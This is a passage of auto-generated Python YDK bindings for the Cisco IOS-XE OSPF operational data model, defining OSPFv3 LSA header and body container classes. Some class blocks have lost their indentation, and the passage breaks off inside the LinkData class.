    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the OSPFv3 LSA 'header' container."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()

        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa-val"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        self.lsa_id = None
        self.lsa_hdr_options = Bits()     # YANG 'bits' leaf: flag-name -> bool mapping
        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


    class LsaHeader(Entity):
        """
        LSA header

        .. attribute:: age

            LSA age

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: type

            LSA type

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: adv_router

            LSA advertising router

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: seq_num

            LSA sequence number

            **type**\: str

            **config**\: False

        .. attribute:: checksum

            LSA checksum

            **type**\: str

            **config**\: False

        .. attribute:: length

            LSA length

            **type**\: int

            **range:** 0..65535

            **config**\: False
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the generated YDK entity for the inner 'lsa-header' container."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()

            self.yang_name = "lsa-header"
            self.yang_parent_name = "header"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ])
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self._segment_path = lambda: "lsa-header"
            # From here on, __setattr__ only accepts the whitelisted leaf names.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Delegate to the Entity framework for leaf validation / freeze enforcement.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the generated YDK entity for the OSPFv3 'lsa-body' container.

    Instantiates one child container per possible decoded LSA body type
    (network, prefix, ia-router, lsa-external, nssa, link-data, ia-prefix)
    and parents each to this node; only the two bits leafs live directly here.
    """
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()

    self.yang_name = "lsa-body"
    self.yang_parent_name = "ospfv3-lsa-val"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: YANG name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
    self._leafs = OrderedDict([
        ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
        ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
    ])
    self.lsa_flag_options = Bits()    # YANG 'bits' leaf: flag-name -> bool mapping
    self.lsa_body_flags = Bits()
    self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"
    self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
    self.prefix.parent = self
    self._children_name_map["prefix"] = "prefix"
    self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
    self.ia_router.parent = self
    self._children_name_map["ia_router"] = "ia-router"
    self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
    self.lsa_external.parent = self
    self._children_name_map["lsa_external"] = "lsa-external"
    self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
    self.nssa.parent = self
    self._children_name_map["nssa"] = "nssa"
    self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
    self.link_data.parent = self
    self._children_name_map["link_data"] = "link-data"
    self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
    self.ia_prefix.parent = self
    self._children_name_map["ia_prefix"] = "ia-prefix"
    self._segment_path = lambda: "lsa-body"
    # From here on, __setattr__ only accepts the whitelisted leaf names.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Only the two bits leafs are writable after the instance is frozen.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
    """
    OSPFv3 network

    .. attribute:: attached_router

        List of the routers attached to the network

        **type**\: list of int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: lsa_net_options

        Network LSA options

        **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the OSPFv3 'network' body container."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        self.attached_router = []
        self.lsa_net_options = Bits()     # YANG 'bits' leaf: flag-name -> bool mapping
        self._segment_path = lambda: "network"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
    """
    OSPFv3 inter area prefix

    .. attribute:: metric

        Metric

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: ia_prefix

        Inter area Prefix

        **type**\: str

        **config**\: False

    .. attribute:: ia_prefix_options

        Inter area prefix options

        **type**\: str

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'prefix' body container."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()

        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
    """
    OSPFv3 inter area router

    .. attribute:: metric

        Metric

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: destination_router_id

        Router ID of the router being described by the LSA

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: lsa_ia_options

        Inter area LSA options

        **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'ia-router' body container."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()

        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()      # YANG 'bits' leaf: flag-name -> bool mapping
        self._segment_path = lambda: "ia-router"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
    """
    OSPFv3 LSA external

    .. attribute:: metric

        Metric

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: flags

        LSA Flags

        **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>`

        **config**\: False

    .. attribute:: referenced_ls_type

        Referenced Link State type

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: external_prefix

        Prefix

        **type**\: str

        **config**\: False

    .. attribute:: external_prefix_options

        Prefix options

        **type**\: str

        **config**\: False

    .. attribute:: forwarding_address

        Forwarding address

        **type**\: union of the below types:

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **type**\: str

        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: external_route_tag

        Route tag

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: referenced_link_state_id

        Referenced Link State ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the generated YDK entity for the 'lsa-external' body container."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()

        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None
        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        # From here on, __setattr__ only accepts the whitelisted leaf names.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the Entity framework for leaf validation / freeze enforcement.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)


    class Flags(Entity):
        """
        LSA Flags

        .. attribute:: e_flag

            When set, the metric specified is a Type 2 external metric

            **type**\: bool

            **config**\: False
        """

        # YANG module prefix and revision this binding was generated from.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize the generated YDK entity for the external-LSA 'flags' container."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            # From here on, __setattr__ only accepts the whitelisted leaf names.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Delegate to the Entity framework for leaf validation / freeze enforcement.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Initialize the generated YDK entity for the 'nssa' body container.

    Holds a single fixed child container, lsa-nssa-external, and no leafs
    of its own.
    """
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()

    self.yang_name = "nssa"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
    self._leafs = OrderedDict()           # no leafs directly on this node
    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
    self.lsa_nssa_external.parent = self
    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
    self._segment_path = lambda: "nssa"
    # From here on, __setattr__ rejects new attributes (no writable leafs here).
    self._is_frozen = True
def __setattr__(self, name, value):
    # Empty whitelist: this container has no leafs, so after freezing only
    # framework-internal assignments are permitted via _perform_setattr.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
    """
    NSSA LSA

    .. attribute:: metric

        Metric

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: flags

        LSA Flags

        **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>`

        **config**\: False

    .. attribute:: referenced_ls_type

        Referenced Link State type

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: external_prefix

        Prefix

        **type**\: str

        **config**\: False

    .. attribute:: external_prefix_options

        Prefix options

        **type**\: str

        **config**\: False

    .. attribute:: forwarding_address

        Forwarding address

        **type**\: union of the below types:

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **type**\: str

        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: external_route_tag

        Route tag

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: referenced_link_state_id

        Referenced Link State ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()

        # Position of this container in the YANG tree.
        self.yang_name = "lsa-nssa-external"
        self.yang_parent_name = "nssa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers reachable from this node: YANG name -> (attr, class).
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        # Leaf values start out unset.
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        # Eagerly instantiate the single child container and wire it up.
        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-nssa-external"
        # Freeze: further attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

    class Flags(Entity):
        """
        LSA Flags

        .. attribute:: e_flag

            When set, the metric specified is a Type 2 external metric

            **type**\: bool

            **config**\: False

        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-nssa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Single boolean leaf: e-flag.
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
    """
    OSPFv3 link data advertised for an interface.

    .. attribute:: rtr_priority

        Router priority of the interface

        **type**\: int

        **range:** 0..255

        **config**\: False

    .. attribute:: link_local_interface_address

        The originating router's link-local interface address on the link
        (IPv4 or IPv6 dotted/colon notation)

        **type**\: str

        **config**\: False

    .. attribute:: num_of_prefixes

        Number of prefixes

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: lsa_id_options

        Link data LSA options

        **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()

        # Position of this container in the YANG tree.
        self.yang_name = "link-data"
